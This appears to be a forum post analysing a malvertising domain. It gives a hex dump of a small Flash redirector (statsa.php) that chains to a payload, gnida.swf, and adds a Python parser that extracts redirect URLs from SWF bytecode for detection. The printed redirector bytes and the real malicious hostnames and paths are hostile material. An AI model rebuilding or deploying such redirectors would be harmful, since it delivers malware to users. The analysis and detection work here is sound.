While Tor blocks attackers on your local network from discovering or influencing your destination, it opens new risks: malicious or misconfigured Tor exit nodes can send you the wrong page, or even send you embedded Java applets disguised as domains you trust.
<h4>
id325708.adszedo.com
</h4>
We first noticed id325708.adszedo.com in the malicious FedEx advertisement here. The website is now hosting the infamous gnida.swf, statsa.php, statsg.php & statss.php files.

id325708.adszedo.com/rgd/statsa.php is a Flash file containing an embedded redirect to statsg.php.
CODE
0: 465753064F000000 300A00A0000C0100 FWS•O••• 0•••••••
10: 4302FFFFFF3F0330 000000832C006874 C••••?•0 ••••,•ht
20: 74703A2F2F696433 32353730382E6164 tp://id3 25708.ad
30: 737A65646F2E636F 6D2F7267642F7374 szedo.co m/rgd/st
40: 617473672E706870 00000040000000   atsg.php •••@•••
statsg.php loads id325708.adszedo.com/rgd/swf/gnida.swf

- All Your SWF Are Belong To Us -
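Added example, not part of Kimberly's post or of the files she dumped: a small Python parser that walks the SWF tag stream of the statsa.php bytes from the hex dump above and pulls out the embedded redirect, i.e. it decodes the `83 2C 00` ActionGetURL record rather than relying on a string search. It also accepts the zlib-compressed CWS form most banners ship in, checks the declared file length, and reports string constants feeding an ActionGetURL2 (the dynamic variant, where the URL comes from the stack). The `geturl2_swf` fixture and the `http://example.invalid/landing` URL are constructed for the demonstration and were not part of the campaign.

```python
import struct
import zlib
# Constructed from the hex dump in the post above: the 79-byte statsa.php SWF (FWS, version 6).
STATSA_SWF = bytes.fromhex(
    "465753064F000000300A00A0000C01004302FFFFFF3F0330000000832C006874"
    "74703A2F2F69643332353730382E6164737A65646F2E636F6D2F7267642F7374"
    "617473672E70687000000040000000"
)
TAG_END, TAG_DO_ACTION, ACTION_GET_URL, ACTION_PUSH, ACTION_GET_URL2 = 0, 12, 0x83, 0x96, 0x9A
PUSH_VALUE_SIZES = {1: 4, 2: 0, 3: 0, 4: 1, 5: 1, 6: 8, 7: 4, 8: 1, 9: 2}  # non-string push types

def swf_body(data):
    """Return (version, declared length, movie body) for an FWS (plain) or CWS (zlib) file."""
    sig, version, length = data[:3], data[3], struct.unpack_from("<I", data, 4)[0]
    if sig not in (b"FWS", b"CWS"):
        raise ValueError("not a SWF: signature %r" % sig)
    body = data[8:] if sig == b"FWS" else zlib.decompress(data[8:])  # CWS: zlib after the header
    if len(body) + 8 != length:  # the length field counts the uncompressed file
        raise ValueError("declared length %d, actual %d" % (length, len(body) + 8))
    return version, length, body

def iter_tags(body):
    """Yield (tag code, tag data). The body opens with a RECT (5-bit width, four fields), a UI16
    frame rate and a UI16 frame count; a tag header is a UI16 of code << 6 | length, 0x3F = UI32 follows."""
    off = (5 + 4 * (body[0] >> 3) + 7) // 8 + 4
    while off + 2 <= len(body):
        hdr = struct.unpack_from("<H", body, off)[0]
        off += 2
        code, length = hdr >> 6, hdr & 0x3F
        if length == 0x3F:
            length = struct.unpack_from("<I", body, off)[0]
            off += 4
        yield code, body[off:off + length]
        off += length
        if code == TAG_END:
            return

def iter_actions(block):
    """Yield (action code, payload) from a DoAction block; codes >= 0x80 carry a UI16 length."""
    pos = 0
    while pos < len(block) and block[pos] != 0:  # 0x00 is ActionEnd
        code, pos, length = block[pos], pos + 1, 0
        if code >= 0x80:
            length = struct.unpack_from("<H", block, pos)[0]
            pos += 2
        yield code, block[pos:pos + length]
        pos += length

def push_strings(payload):
    """String constants (type 0) in an ActionPush payload; other value types are skipped by size."""
    out, pos = [], 0
    while pos < len(payload) and (payload[pos] == 0 or payload[pos] in PUSH_VALUE_SIZES):
        vtype, pos = payload[pos], pos + 1
        if vtype == 0:
            end = payload.index(b"\x00", pos)
            out.append(payload[pos:end].decode("latin-1"))
            pos = end + 1
        else:
            pos += PUSH_VALUE_SIZES[vtype]
    return out

def extract_urls(swf):
    """Return (static, dynamic): ActionGetURL targets, plus URL-looking strings pushed in any
    DoAction block that calls ActionGetURL2, which takes its URL from the stack at run time."""
    static, dynamic = [], []
    for code, data in iter_tags(swf_body(swf)[2]):
        if code != TAG_DO_ACTION:
            continue
        pushed, uses_geturl2 = [], False
        for acode, payload in iter_actions(data):
            if acode == ACTION_GET_URL:  # payload is URL\0 target\0
                static.append(payload.split(b"\x00")[0].decode("latin-1"))
            elif acode == ACTION_PUSH:
                pushed += push_strings(payload)
            elif acode == ACTION_GET_URL2:
                uses_geturl2 = True
        if uses_geturl2:
            dynamic += [s for s in pushed if "://" in s]
    return static, dynamic

def compress_swf(swf):
    """Re-emit an FWS file as CWS, the form most real banners ship in."""
    return b"CWS" + swf[3:8] + zlib.compress(swf[8:])

def geturl2_swf(url):
    """Constructed fixture: STATSA_SWF's movie header plus a DoAction that pushes the URL and a
    target, then calls ActionGetURL2 (method 0, loadTargetFlag 0): the dynamic redirect form."""
    push = b"\x00" + url.encode() + b"\x00\x00_self\x00"
    actions = (bytes([ACTION_PUSH]) + struct.pack("<H", len(push)) + push
               + bytes([ACTION_GET_URL2]) + struct.pack("<HB", 1, 0) + b"\x00")
    body = (STATSA_SWF[8:16] + struct.pack("<HI", (TAG_DO_ACTION << 6) | 0x3F, len(actions))
            + actions + struct.pack("<H", TAG_END))
    return b"FWS\x06" + struct.pack("<I", len(body) + 8) + body

if __name__ == "__main__":
    for blob in (STATSA_SWF, compress_swf(STATSA_SWF), geturl2_swf("http://example.invalid/landing")):
        print(swf_body(blob)[:2], extract_urls(blob))
```

For statsa.php the tag stream is SetBackgroundColor (9), DoAction (12), ShowFrame (1), End (0), and the DoAction holds a single ActionGetURL pointing at `http://id325708.adszedo.com/rgd/statsg.php`, which is exactly what the hex dump shows in its ASCII column. Two caveats: the parser only understands ActionScript 1/2 bytecode, so a Flash 9+ banner that redirects from a DoABC tag needs an ABC disassembler instead, and a declared length that does not match the decompressed size is treated as an error rather than silently parsed.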
Invision Power Board © 2001-2014 Invision Power Services, Inc.